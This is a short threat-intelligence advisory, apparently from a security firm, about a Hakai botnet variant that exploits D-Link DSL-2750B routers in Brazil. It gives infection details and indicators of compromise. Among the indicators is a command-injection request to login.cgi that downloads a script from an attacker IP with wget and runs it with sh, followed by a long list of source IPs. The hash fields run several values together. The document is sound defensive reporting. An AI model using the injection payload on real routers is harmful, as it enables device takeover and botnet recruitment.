Tempest’s monitoring team identified a quite active variant of Haikai botnet, attempting to exploit vulnerabilities in D-Link DSL-2750B routers in Latin America, particularly in Brazil.

This botnet has been detected by our sensors 134 times just this month and, so far, it is using 119 different IP addresses.

The infection method is the same as used by other botnets that have been widely reported by Tempest and other researchers. It takes advantage of a remote command execution vulnerability in which the attacker downloads a Shell Script file that runs on the device and, depending on the device architecture, will download the appropriate binary (hakai.mips, hakai.mpls, hakai. x86_x64). The binary uses a packer called UPX (Ultimate Packer for eXecutables), which is well known and open source, available on GitHub.

After the infection, the device connects to the attacker’s control panel and receives commands to attack or to attempt to infect other devices.

The control panel closely resembles to Gafgyt botnet, which had its source code released years ago and was also identified as LizardStresser — the botnet used by the Lizard Squad group in its DDoS-as-a-service. This variant is able to trigger HTTP, UDP, TCP and STD attacks. STD attacks occur when the attacker sends packets with a random payload of 1024 bytes.

IOCs

Payload:

GET /login.cgi?cli=aa aa’;wget hxxp://46[.]166[.]185[.]42/e -O -> /tmp/hk;sh /tmp/hk’

Payload source:

hxxp://46[.]166[.]185[.]42/e

Hash MD5:

0590e9af54485c9a94ed97ea1b7c022ce7a32ca82dca999437e5ebb4c76b676002baea1994dc58bbfa3bf7944629a6e3c288f1fa87225e61f0757fb9eaeb237c

Hash SHA256:

8ff5a8e20209267984ca4fe609ae7a8feccabda9114304c1444abc53cb169f5f3d98fd28c344b067e91881d06942f7532a1f4084d908d882d3975fe0709c85f59688a3fdfd8fcb2caa2962623af9cd64c2a74887057900dbca5179aef8c5f3194072d3b5393d86bf5b6586eec58efe79f3b5b428d183048968ad329fc982aa45

Unique IPs

115.211.158.127

151.25.16.155

151.67.179.72

151.70.150.145

156.194.16.10

156.194.186.237

156.194.226.4

156.194.41.138

156.195.200.13

156.196.179.29

156.196.185.140

156.196.200.81

156.196.242.173

156.197.171.232

156.198.221.75

156.199.204.140

156.199.77.123

156.201.79.16

156.203.178.17

156.204.155.113

156.205.135.43

156.205.195.104

156.206.115.220

156.209.198.100

156.209.232.198

156.209.54.177

156.210.187.42

156.211.96.230

156.212.13.107

156.212.209.151

156.212.214.221

156.212.98.46

156.213.104.172

156.213.169.78

156.213.173.45

156.213.244.171

156.213.99.66

156.216.224.31

156.217.140.86

156.217.50.123

156.218.75.76

156.219.145.253

156.219.192.162

156.219.229.182

156.220.127.23

156.220.138.137

156.220.143.93

156.220.253.82

156.220.44.52

156.221.116.143

156.221.123.7

156.221.148.113

156.221.172.223

156.221.5.177

156.223.130.168

156.223.165.48

156.223.95.196

187.64.72.94

197.246.180.121

197.32.137.152

197.32.8.123

197.34.56.237

197.38.130.42

197.38.71.15

197.39.86.166

197.41.204.206

197.42.132.154

197.42.33.96

197.44.8.66

197.46.178.52

197.51.1.213

197.52.14.196

197.52.168.225

197.54.198.40

197.54.98.170

197.55.65.76

197.55.80.40

197.57.173.100

197.58.121.102

197.58.237.253

31.194.147.178

41.230.140.29

41.232.65.213

41.234.237.128

41.235.138.212

41.235.183.103

41.238.179.235

41.238.9.217

41.239.164.80

41.35.24.91

41.36.188.159

41.36.244.219

41.36.248.103

41.36.30.115

41.37.27.36

41.38.139.146

41.39.39.33

41.41.112.189

41.42.150.61

41.42.205.120

41.44.103.75

41.44.127.25

41.44.196.33

41.44.3.243

41.44.53.155

41.44.56.89

41.45.128.60

41.45.143.5

41.45.182.174

41.46.143.91

41.46.243.97

41.47.49.254

79.129.7.154

79.24.80.194

80.15.21.65

80.183.8.179

83.28.135.202

85.72.59.101

94.70.161.249